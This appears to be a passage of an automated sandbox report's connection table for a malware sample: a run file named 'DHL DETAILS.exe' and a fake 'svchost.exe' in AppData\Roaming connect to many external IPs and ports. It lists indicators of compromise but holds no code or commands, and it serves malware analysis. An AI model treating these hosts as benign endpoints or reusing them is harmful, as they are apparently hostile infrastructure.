                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5238192.168.2.55109345.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5239192.168.2.55109545.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5240192.168.2.55109745.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5241192.168.2.55110745.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5242192.168.2.550449140.238.25.255210006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5243192.168.2.550639185.162.230.178806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5244192.168.2.56353991.134.140.1601221756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5245192.168.2.550667104.17.9.114806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5246192.168.2.5503918.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5247192.168.2.550688173.245.49.27806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5248192.168.2.55070531.43.179.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5249192.168.2.550713104.20.123.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5250192.168.2.550403122.51.123.219806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5251192.168.2.550499193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5252192.168.2.56500451.15.133.2141637943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5253192.168.2.550799104.21.194.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5254192.168.2.55040691.202.230.21980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5255192.168.2.55050086.8.163.8891506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5256192.168.2.550823172.67.182.102806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5257192.168.2.56505551.222.241.1575171856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5258192.168.2.550753103.152.112.167806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5259192.168.2.550399218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5260192.168.2.55059582.210.56.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5261192.168.2.55064564.56.150.10231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5262192.168.2.54930636.134.91.82888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5263192.168.2.550825157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5264192.168.2.565065190.103.61.254808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5265192.168.2.55096574.48.7.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5266192.168.2.56360360.188.102.2251808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5267192.168.2.551148172.67.181.85806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5268192.168.2.55056593.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5269192.168.2.565146206.81.31.2158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5270192.168.2.563552195.248.243.149723756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5271192.168.2.551183132.148.244.30449576352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5272192.168.2.551204192.64.115.90471006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5273192.168.2.56508181.16.1.1873265056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5274192.168.2.55064382.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5275192.168.2.550773221.194.149.8806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5276192.168.2.550797216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5277192.168.2.550895104.129.199.5788006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5278192.168.2.551156198.12.253.117311316352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5279192.168.2.56514479.143.187.581899056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5280192.168.2.551149191.102.159.15731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5281192.168.2.55119145.196.151.12054326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5282192.168.2.551215159.65.233.11580006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5283192.168.2.55091343.128.146.42156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5284192.168.2.551151167.71.5.8331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5285192.168.2.550559121.159.146.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5286192.168.2.550611120.48.62.23980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5287192.168.2.551031104.17.248.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5288192.168.2.551064172.67.181.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5289192.168.2.551071104.16.108.204806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5290192.168.2.5508473.9.71.16731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5291192.168.2.551007198.199.86.1131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5292192.168.2.550712103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5293192.168.2.55122946.17.63.16641546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5294192.168.2.55097092.204.134.38258256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5295192.168.2.551069162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5296192.168.2.55124161.111.38.5806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5297192.168.2.550927154.12.178.107299856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5298192.168.2.550865190.128.228.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5299192.168.2.551028152.70.244.240162386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5300192.168.2.550948170.64.222.8680006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5301192.168.2.55102479.110.196.14580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5302192.168.2.55107947.243.205.131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5303192.168.2.551065138.36.150.1610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5304192.168.2.55121347.114.101.5788886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5305192.168.2.561737162.214.227.686043356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5306192.168.2.565312103.118.127.218696956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5307192.168.2.549656192.252.216.81414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5308192.168.2.551165222.179.155.9090916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5309192.168.2.55116651.161.131.84630556352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5310192.168.2.550910103.127.1.130806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5311192.168.2.56165692.204.135.373252456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5312192.168.2.55111149.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5313192.168.2.551246211.222.252.18781936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5314192.168.2.565248117.30.118.200811843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5315192.168.2.56362351.15.234.2221637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5316192.168.2.563674128.199.165.633357456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5317192.168.2.55103551.68.164.77328246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5318192.168.2.55126774.48.7.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5319192.168.2.55137643.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5320192.168.2.55137743.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5321192.168.2.55137843.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5322192.168.2.55138043.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5323192.168.2.56368245.11.95.165603956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5324192.168.2.551248202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5325192.168.2.550264142.54.232.641456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5326192.168.2.54954572.167.38.74565043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5327192.168.2.561658176.8.230.197818756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5328192.168.2.55124590.188.250.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5329192.168.2.549573115.96.208.124808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5330192.168.2.5512823.212.148.19931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5331192.168.2.551283157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5332192.168.2.549568177.234.194.15599943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5333192.168.2.56369734.125.246.2238056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5334192.168.2.5512515.44.42.115583866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5335192.168.2.551289107.180.90.88553476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5336192.168.2.551313172.64.207.185806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5337192.168.2.56528972.217.158.202414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5338192.168.2.551352185.162.231.226806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5339192.168.2.551305142.4.123.41806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5340192.168.2.551334104.17.16.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5341192.168.2.549509148.72.206.2503570343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5342192.168.2.551270194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5343192.168.2.55140945.12.31.140806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5344192.168.2.551429104.22.14.48806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5345192.168.2.549477222.223.103.232730243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5346192.168.2.54948794.23.252.168918043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5347192.168.2.551306162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5348192.168.2.561749146.59.18.2464097556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5349192.168.2.551540172.67.250.212806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5350192.168.2.551528185.162.228.48806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5351192.168.2.551469104.17.239.10806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5352192.168.2.55170661.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5353192.168.2.55171461.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5354192.168.2.551609104.16.224.33806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5355192.168.2.55171661.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5356192.168.2.551299121.159.146.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5357192.168.2.55172961.130.9.384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5358192.168.2.551530164.92.86.113540936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5359192.168.2.551458162.214.227.68567966352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5360192.168.2.56371337.187.91.1922198156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5361192.168.2.551286139.198.120.15295276352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5362192.168.2.550883117.160.250.134806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5363192.168.2.551899152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5364192.168.2.5512918.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5365192.168.2.551907152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5366192.168.2.551924152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5367192.168.2.5514655.161.179.23931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5368192.168.2.551942152.32.132.2204436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5369192.168.2.551650172.67.182.107806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5370192.168.2.55153645.196.151.9754326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5371192.168.2.551660172.67.200.220806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5372192.168.2.55016751.222.241.15757176352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5373192.168.2.55131960.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5374192.168.2.551553159.203.61.16931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5375192.168.2.55125272.49.49.11310346352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5376192.168.2.5513698.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


